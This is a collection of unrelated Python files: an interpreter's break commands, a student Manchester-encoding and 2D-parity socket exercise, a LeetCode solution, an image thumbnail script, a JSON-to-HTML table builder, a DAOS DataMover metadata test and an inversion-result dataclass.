            return command.FUNC_TERMINATE
        # Any other response falls through, implicitly returning None.
class RIfBreak(command.Command):
    """Conditional break: pops the register queue and terminates the loop
    when the popped value is truthy."""
    def execute(self, env):
        if env.rqueue is None:
            # NOTE(review): `exceptions` is not imported in this chunk (only
            # `import command` is visible), so this raise would itself fail
            # with NameError — confirm the intended import upstream.
            raise exceptions.QQError("Register queue is not allocated")
        cond = bool(env.rqueue.pop().value)
        if cond:
            return command.LOOP_TERMINATE
class Break(command.Command):
    """Unconditional break: always signals loop termination."""
    def execute(self, env):
        return command.LOOP_TERMINATE
|
# Kazi Shadman Sakib
# Roll : 097
import socket
import random
def errorInserted(encodedVoltageStream):
    """Flip one randomly chosen voltage sign ('+' <-> '-') to simulate an error.

    Characters ' ', '5' and 'V' are never modified; the function keeps
    drawing random positions until it hits a sign character. Returns the
    stream unchanged when it contains no sign at all (the original would
    loop forever in that case).
    """
    length = len(encodedVoltageStream)
    # Guard: no '+'/'-' present (including the empty string) -> nothing to flip.
    if "+" not in encodedVoltageStream and "-" not in encodedVoltageStream:
        return encodedVoltageStream
    while(1):
        # Bug fix: random.randint(0, length) is inclusive of `length` and
        # could raise IndexError; randrange(length) stays within bounds.
        i = random.randrange(length)
        if(encodedVoltageStream[i] == "+"):
            print("Randomly changed positive level, " + encodedVoltageStream[i])
            encodedVoltageStream = encodedVoltageStream[:i] + '-' + encodedVoltageStream[i+1:]
            print("To a negative level, " + encodedVoltageStream[i])
            break
        elif(encodedVoltageStream[i] == "-"):
            print("Randomly changed negative level, " + encodedVoltageStream[i])
            encodedVoltageStream = encodedVoltageStream[:i] + '+' + encodedVoltageStream[i+1:]
            print("To a positive level, " + encodedVoltageStream[i])
            break
    return encodedVoltageStream
def encode(parityBitStream):
    """Manchester-encode a bit stream as voltage-level text.

    Each '0' becomes "+5V -5V" and each '1' becomes "-5V +5V", separated
    by single spaces. Any other character aborts encoding and yields the
    string "Incorrect bit stream".
    """
    pieces = []
    for bit in parityBitStream:
        if bit == "0":
            pieces.append("+5V -5V")
        elif bit == "1":
            pieces.append("-5V +5V")
        else:
            # Invalid symbol: same sentinel string the caller expects.
            return "Incorrect bit stream"
    # Joining avoids the original's special-casing of the final element.
    return " ".join(pieces)
def parityCheck(bitStream):
    """Build a 2D (row + column) even-parity block for bitStream and save
    it to '2DParity.txt'.

    The stream is treated as rows of 8 data bits. Each row gets a 9th
    even-parity bit, and a final 9-bit row holds the per-column parities;
    its own last bit is the parity of the column-parity bits.

    Bug fix vs. the original: the row 1-counter is now reset for every row
    (the original accumulated `count_1` across rows, so later row parities
    were computed over all preceding rows as well).

    Args:
        bitStream (str): characters '0'/'1'; length assumed to be a
            multiple of 8 -- any trailing partial row is ignored, as before.
    """
    cols = 8
    rows = len(bitStream) // cols
    arr = []
    k = 0
    for _ in range(rows):
        row = []
        ones = 0  # per-row counter; reset each row (this was the bug)
        for _ in range(cols):
            if bitStream[k] == "1":
                ones += 1
            row.append(bitStream[k])
            k += 1
        # Even parity: 0 when the number of 1s is even, else 1.
        row.append(ones % 2)
        arr.append(row)
    # Column parities over the data rows (cells are '0'/'1' strings).
    parity_row = []
    for j in range(cols):
        col_ones = sum(1 for i in range(rows) if arr[i][j] == "1")
        parity_row.append(col_ones % 2)
    # Bottom-right corner: parity of the column-parity bits themselves.
    parity_row.append(sum(parity_row) % 2)
    arr.append(parity_row)
    # with-statement closes the file even if a write fails.
    with open("2DParity.txt", "w") as fileOpen:
        for i in range(rows + 1):
            for j in range(cols + 1):
                fileOpen.write(str(arr[i][j]))
# Client side of the 2D-parity / Manchester-encoding exercise:
# read a bit stream, add 2D parity, Manchester-encode it, send the clean
# stream to the server, then send a deliberately corrupted copy.
# NOTE(review): in the prints below, ""file.txt"" is two adjacent string
# literals, so Python concatenates them and the intended quotes never
# appear in the output -- probably meant \"file.txt\" (left unchanged here).
s = socket.socket()
host = socket.gethostname()
port = 22122
s.connect((host,port))
print("Considering bit stream from ""inputBitStream.txt"" file")
fileOpen_1 = open("inputBitStream.txt", "r")
bitStream = fileOpen_1.read()
fileOpen_1.close()
print("Input bit stream is - ", bitStream)
print()
# Tell the server how long the original (pre-parity) data is.
lengthOfOriginalData = str(len(bitStream))
s.send(lengthOfOriginalData.encode())
# Add 2D parity; parityCheck writes its result to 2DParity.txt.
print("Added 2D parity with the bit stream and saved it in ""2DParity.txt"" file")
parityCheck(bitStream)
fileOpen_2 = open("2DParity.txt","r")
parityBitStream = fileOpen_2.read()
fileOpen_2.close()
print("Bit stream after adding 2D parity is: " + parityBitStream)
print()
# Manchester-encode the parity-protected stream.
print("Encoding the 2D parity bit stream given in ""2DParity.txt"" file according to Manchester Scheme")
encodedVoltageStream = encode(parityBitStream)
print("Manchester Encoded Bit Stream is:")
print(encodedVoltageStream)
fileOpen_3 = open("encodedBitStream.txt","w")
fileOpen_3.write(encodedVoltageStream)
fileOpen_3.close()
print("Manchester Encoded Bit Stream is saved in ""encodedBitStream.txt"" file")
print()
# First transmission: the valid encoded stream.
print("Sending the valid Manchester Encoded Bit Stream to Server")
print()
s.send(encodedVoltageStream.encode())
# Corrupt one voltage level to exercise the server's error detection.
print("Inserting an error voltage level to the valid encoded bit stream")
errorVoltageStream = errorInserted(encodedVoltageStream)
print("Error Encoded Bit Stream is: ")
print(errorVoltageStream)
fileOpen_4 = open("errorVoltageStream.txt","w")
fileOpen_4.write(errorVoltageStream)
fileOpen_4.close()
print("Error Encoded Bit Stream is saved in ""errorVoltageStream.txt"" file")
print()
# Second transmission: the corrupted stream.
print("Sending the Invalid Encoded Bit Stream to Server")
print()
s.send(errorVoltageStream.encode())
print("Server says: " + s.recv(1024).decode())
s.close()
class Solution:
    def nextGreaterElement(self, n: int) -> int:
        """Return the smallest integer formed from the same digits as ``n``
        that is strictly greater than ``n``; -1 if none exists or the
        answer exceeds the signed 32-bit range.
        """
        seq = list(str(n))
        N = len(seq)
        if N < 2:
            return -1
        # Find the rightmost ascent seq[i] < seq[i+1]. The `i >= 0` guard
        # fixes the original, which walked i into negative indices and
        # raised IndexError for repeated-digit inputs such as 11.
        i = N - 2
        while i >= 0 and seq[i] >= seq[i+1]:
            i -= 1
        if i < 0:
            # Digits are non-increasing: n is the largest permutation.
            return -1
        # Rightmost digit strictly greater than seq[i].
        j = N - 1
        while seq[i] >= seq[j]:
            j -= 1
        seq[i], seq[j] = seq[j], seq[i]
        # The suffix is non-increasing; reversing it minimizes the tail.
        seq[i+1:] = reversed(seq[i+1:])
        ret = int("".join(seq))
        # (1 << 31) - 1 == 2**31 - 1. The original `1 << 31 - 1` parsed as
        # `1 << 30` because `-` binds tighter than `<<`.
        if ret <= (1 << 31) - 1:
            return ret
        else:
            return -1
    def nextGreaterElement_sort(self, n: int) -> int:
        """Alternative implementation: monotonic stack to find the swap
        position, then sort the suffix. Same contract as nextGreaterElement.
        """
        seq = [int(e) for e in str(n)]
        stk = []
        for i in range(len(seq) - 1, -1 , -1):
            e = seq[i]
            popped = None
            while stk and seq[stk[-1]] > e:
                popped = stk.pop()
            # `is not None` rather than truthiness: a popped index could in
            # principle be 0, which is falsy.
            if popped is not None:
                seq[i], seq[popped] = seq[popped], seq[i]
                seq[i+1:] = sorted(seq[i+1:])
                ret = int("".join(map(str, seq)))
                # Same 32-bit bound fix as above.
                if ret <= (1 << 31) - 1:
                    return ret
                else:
                    return -1
            stk.append(i)
        return -1
if __name__ == "__main__":
    # Quick sanity check of the primary implementation.
    solver = Solution()
    assert solver.nextGreaterElement(12) == 21
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 1 15:04:03 2018
@author: Administrator
"""
from PIL import Image
import glob, os
# Bounding box for the generated thumbnails (width, height).
size = 128, 128
# Make a thumbnail of every JPEG in the working directory, saved next to
# the original with a ".thumbnail" extension.
for source_name in glob.glob("*.jpg"):
    base, _ext = os.path.splitext(source_name)
    image = Image.open(source_name)
    # thumbnail() resizes in place, preserving aspect ratio within `size`.
    image.thumbnail(size)
    image.save(base + ".thumbnail", "JPEG")
import json
# Build an HTML table from table.json, which maps
# {column_key: {row_key: value}}, and write it to table.html.
# `with` blocks fix the original's leaked file handles (neither the JSON
# input nor the HTML output was ever closed).
with open('table.json', 'r') as src:
    data = json.load(src)
keys = list(data.keys())
second_level = [data[k].keys() for k in keys]
# Every column must expose the same row keys (dict views compare as sets).
for l in second_level:
    assert l == second_level[0]
table = '<div style="display: flex; justify-content: center;">\n<table class="styled-table">\n'
# Header row: one blank corner cell plus one <th> per column key.
table += '<thead>\n<tr>\n<th>Estrategias</th>\n'
for k in keys:
    table += f'<th>{k}</th>\n'
table += '</tr>\n</thead>\n<tbody>\n'
# One body row per shared row key, values rendered as percentages.
for sk in second_level[0]:
    table += f'<tr>\n<th>{sk}</th>\n'
    for k in keys:
        table += f'<td>{data[k][sk]} %</td>\n'
    table += '</tr>'
table += '</tbody>\n</table>\n</div>\n'
with open('table.html', 'w') as dst:
    dst.write(table)
|
"""
(C) Copyright 2020-2023 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
from os.path import join
from data_mover_test_base import DataMoverTestBase
from exception_utils import CommandFailure
class DmvrPosixMetaEntry(DataMoverTestBase):
    # pylint: disable=too-many-ancestors
    """Test class for POSIX DataMover entry metadata validation.
    Test Class Description:
        Tests metadata preservation on POSIX entries.
        I.e. files, directories, symlinks.
    :avocado: recursive
    """
    def test_dm_posix_meta_entry_dcp(self):
        """JIRA id: DAOS-6390
        Test Description:
            Verifies that POSIX metadata is preserved for dcp.
        :avocado: tags=all,full_regression
        :avocado: tags=vm
        :avocado: tags=datamover,mfu,mfu_dcp,dfs,dfuse
        :avocado: tags=dm_posix_meta_entry,dm_posix_meta_entry_dcp
        :avocado: tags=DmvrPosixMetaEntry,test_dm_posix_meta_entry_dcp
        """
        self.run_dm_posix_meta_entry("DCP")
    def run_dm_posix_meta_entry(self, tool):
        """Run the test on a given tool.
        Use Cases:
            Create pool1.
            Create cont1 and cont2 in pool1.
            Create a source directory in cont1 that contains:
                1 directory, 1 file, 1 symlink.
                xattrs on the directory and file.
            Create a similar source directory in an external POSIX file system.
            Copy the DAOS source to another DAOS directory.
            Copy the DAOS source to an external POSIX file system.
            Copy the POSIX source to another DAOS directory.
            For each case, verify that permissions and owners are preserved.
            Repeat each case, but with the --preserve flag.
            For each case, verify that xattrs and timestamps are preserved.
        Args:
            tool (str): The DataMover tool to run the test with.
                Must be a valid tool in self.TOOLS.
        """
        # Set the tool to use
        self.set_tool(tool)
        # Get preserve level
        # NOTE(review): read from the test yaml; assumed to be bool-like
        # since it gates cmp_times/cmp_xattr below -- confirm in the yaml.
        preserve_on = self.params.get("preserve", "/run/{}/*".format(self.tool.lower()))
        test_desc = self.test_id + " (preserve={})".format(str(preserve_on))
        # Start dfuse to hold all pools/containers
        self.start_dfuse(self.dfuse_hosts)
        # Create 1 pool
        pool1 = self.create_pool()
        # Create 1 source container with test data
        cont1 = self.get_container(pool1)
        daos_src_path = self.new_daos_test_path(False)
        # dfuse view of the same path: <mount>/<pool uuid>/<cont uuid><path>
        dfuse_src_path = "{}/{}/{}{}".format(
            self.dfuse.mount_dir.value, pool1.uuid, cont1.uuid, daos_src_path)
        self.create_data(dfuse_src_path)
        # Create 1 source posix path with test data
        posix_src_path = self.new_posix_test_path(parent=self.workdir)
        self.create_data(posix_src_path)
        # Run each variation with and without the --preserve option
        # For each case, create a new destination directory.
        # For DAOS, cont1 is used as the source and destination.
        # DAOS -> DAOS
        daos_dst_path = self.new_daos_test_path(False)
        dfuse_dst_path = "{}/{}/{}{}".format(
            self.dfuse.mount_dir.value, pool1.uuid, cont1.uuid, daos_dst_path)
        self.run_datamover(
            test_desc + "(DAOS->DAOS)",
            "DAOS", daos_src_path, pool1, cont1,
            "DAOS", daos_dst_path, pool1, cont1)
        # mtime/xattrs are only expected to survive when preserve is on.
        self.compare_data(dfuse_src_path, dfuse_dst_path,
                          cmp_times=preserve_on, cmp_xattr=preserve_on)
        # DAOS -> POSIX
        posix_dst_path = self.new_posix_test_path(create=False, parent=self.workdir)
        self.run_datamover(
            test_desc + "(DAOS->POSIX)",
            "DAOS", daos_src_path, pool1, cont1,
            "POSIX", posix_dst_path)
        self.compare_data(
            dfuse_src_path, posix_dst_path,
            cmp_times=preserve_on, cmp_xattr=preserve_on)
        # POSIX -> DAOS
        daos_dst_path = self.new_daos_test_path(False)
        dfuse_dst_path = "{}/{}/{}{}".format(
            self.dfuse.mount_dir.value, pool1.uuid, cont1.uuid, daos_dst_path)
        self.run_datamover(
            test_desc + "(POSIX->DAOS)",
            "POSIX", posix_src_path, None, None,
            "DAOS", daos_dst_path, pool1, cont1)
        self.compare_data(
            posix_src_path, dfuse_dst_path,
            cmp_times=preserve_on, cmp_xattr=preserve_on)
    def create_data(self, path):
        """Create the test data.
        Builds dir1/ containing file1 and symlink link1, with two xattrs
        on both the directory and the file, via shell commands on the host.
        Args:
            path (str): Where to create the data.
        """
        cmd_list = [
            # One directory
            "mkdir -p '{}'".format(join(path, "dir1")),
            "pushd '{}'".format(path),
            # xattrs for the directory
            "setfattr -n 'user.dir1_attr1' -v 'dir1_value1' 'dir1'",
            "setfattr -n 'user.dir1_attr2' -v 'dir1_value2' 'dir1'",
            # One file in the directory
            "echo 'test_data' > 'dir1/file1'",
            # xattrs for the file
            "setfattr -n 'user.file1_attr1' -v 'file1_value1' 'dir1/file1'",
            "setfattr -n 'user.file1_attr2' -v 'file1_value2' 'dir1/file1'",
            # One symlink in the directory
            "ln -s 'file1' 'dir1/link1'",
            "popd"
        ]
        self.execute_cmd_list(cmd_list)
    def compare_data(self, path1, path2, cmp_filetype=True,
                     cmp_perms=True, cmp_owner=True, cmp_times=False,
                     cmp_xattr=False):
        """Compare the test data.
        Args:
            path1 (str): The left-hand side to compare.
            path2 (str): The right-hand side to compare.
            cmp_filetype (bool, optional): Whether to compare the file-type.
                Default is True.
            cmp_perms (bool, optional): Whether to compare the permissions.
                Default is True.
            cmp_owner (bool, optional): Whether to compare the user and group
                ownership. Default is True.
            cmp_times (bool, optional): Whether to compare mtime.
                Default is False.
            cmp_xattr (bool, optional): Whether to compare xattrs.
                Default is False.
        """
        self.log.info("compare_data('%s', '%s')", path1, path2)
        # Generate the fields to compare
        field_printf = ""
        if cmp_filetype:
            field_printf += "File Type: %F\\n"
        if cmp_perms:
            field_printf += "Permissions: %A\\n"
        if cmp_owner:
            field_printf += "Group Name: %G\\n"
            field_printf += "User Name: %U\\n"
        if cmp_times:
            field_printf += "mtime: %Y\\n"
        # Diff the fields for each entry
        for entry in ["dir1", "dir1/file1", "dir1/link1"]:
            entry1 = join(path1, entry)
            entry2 = join(path2, entry)
            if field_printf:
                # Use stat to get perms, etc.
                stat_cmd1 = "stat --printf '{}' '{}'".format(
                    field_printf, entry1)
                stat_cmd2 = "stat --printf '{}' '{}'".format(
                    field_printf, entry2)
                # Process substitution lets diff compare both stat outputs
                # without temp files; stderr is folded in so errors differ too.
                diff_cmd = "diff <({} 2>&1) <({} 2>&1)".format(
                    stat_cmd1, stat_cmd2)
                result = self.execute_cmd(diff_cmd, fail_on_err=False)
                # NOTE(review): `result` appears to map exit codes to host
                # sets; any non-zero code, or a mix of codes, means at least
                # one host saw a difference -- confirm execute_cmd's contract.
                if 0 not in result or len(result) > 1:
                    hosts = [str(nodes) for code, nodes in list(result.items()) if code != 0]
                    raise CommandFailure(
                        "Command to check files failed '{}' on {}".format(diff_cmd, hosts))
            if cmp_xattr:
                # Use getfattr to get the xattrs
                xattr_cmd1 = "getfattr -d -h '{}'".format(entry1)
                xattr_cmd2 = "getfattr -d -h '{}'".format(entry2)
                # -I '^#' makes diff ignore getfattr's "# file: ..." header,
                # which legitimately differs between the two paths.
                diff_cmd = "diff -I '^#' <({} 2>&1) <({} 2>&1)".format(
                    xattr_cmd1, xattr_cmd2)
                self.execute_cmd(diff_cmd)
    def execute_cmd_list(self, cmd_list):
        """Execute a list of commands, separated by &&.
        Args:
            cmd_list (list): A list of commands to execute.
        """
        # && chaining aborts the remainder as soon as one command fails.
        cmd = " &&\n".join(cmd_list)
        self.execute_cmd(cmd)
|
from dataclasses import dataclass,field
import numpy as np
from ..header_utils import get_last_keyword
@dataclass
class Result(object):
    """Container for the outputs of a linear inversion.
    Field names (istop, itn, r1norm, acond, ...) follow the conventions of
    scipy.sparse.linalg.lsqr-style solvers -- presumably populated from one;
    confirm at the call site.
    """
    method: str = ''
    # default_factory gives every instance its OWN empty array; the
    # original `field(default=np.zeros(0))` shared a single mutable ndarray
    # across all instances constructed with the default.
    x: np.ndarray = field(default_factory=lambda: np.zeros(0))
    istop: int = -1
    itn: int = 0
    r1norm: float = 0.0
    r2norm: float = 0.0
    anorm: float = 0.0
    acond: float = 0.0
    arnorm: float = 0.0
    xnorm: float = 0.0
    lo: np.ndarray = field(default_factory=lambda: np.zeros(0))
    hi: np.ndarray = field(default_factory=lambda: np.zeros(0))
    damp: float = 1.0
    @property
    def logdamp(self):
        """log10 of the damping parameter."""
        return np.log10(self.damp)
    @property
    def xy(self):
        """(log10 r1norm, log10 xnorm) -- a point for an L-curve plot."""
        return np.log10(self.r1norm), np.log10(self.xnorm)
    def update_header(self, hdr, after=None):
        """Record the inversion diagnostics in a header object.
        Args:
            hdr: header supporting ``set(key, value=..., after=...,
                before=..., comment=...)`` (e.g. an astropy-style header).
            after: unused; retained for backward compatibility.
        """
        # Append after the current last keyword so ordering stays stable.
        last = get_last_keyword(hdr)
        hdr.set('INVERTER', value=self.method, after=last,
                comment='method for inversion')
        hdr.set('ACOND', value=self.acond, after='INVERTER',
                comment='Condition of the matrix')
        hdr.set('ANORM', value=self.anorm, after='ACOND',
                comment='norm of matrix')
        hdr.set('ARNORM', value=self.arnorm, after='ANORM',
                comment='norm of matrix')
        hdr.set('R1NORM', value=self.r1norm, after='ARNORM',
                comment='chi2')
        hdr.set('R2NORM', value=self.r2norm, after='R1NORM',
                comment='norm of damped chi2')
        hdr.set('XNORM', value=self.xnorm, after='R2NORM',
                comment='norm of x')
        hdr.set('ISTOP', value=self.istop, after='XNORM',
                comment='stopping condition')
        hdr.set('ITER', value=self.itn, after='ISTOP',
                comment='number of iterations')
        # Blank lines and a section banner ahead of the block.
        hdr.set('', value='', before='INVERTER')
        hdr.set('', value=' / Linear Results', before='INVERTER')
        hdr.set('', value='', before='INVERTER')
if __name__ == '__main__':
    # Minimal smoke test: construct a Result and echo its method field.
    demo = Result('kjdk')
    print(demo.method)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.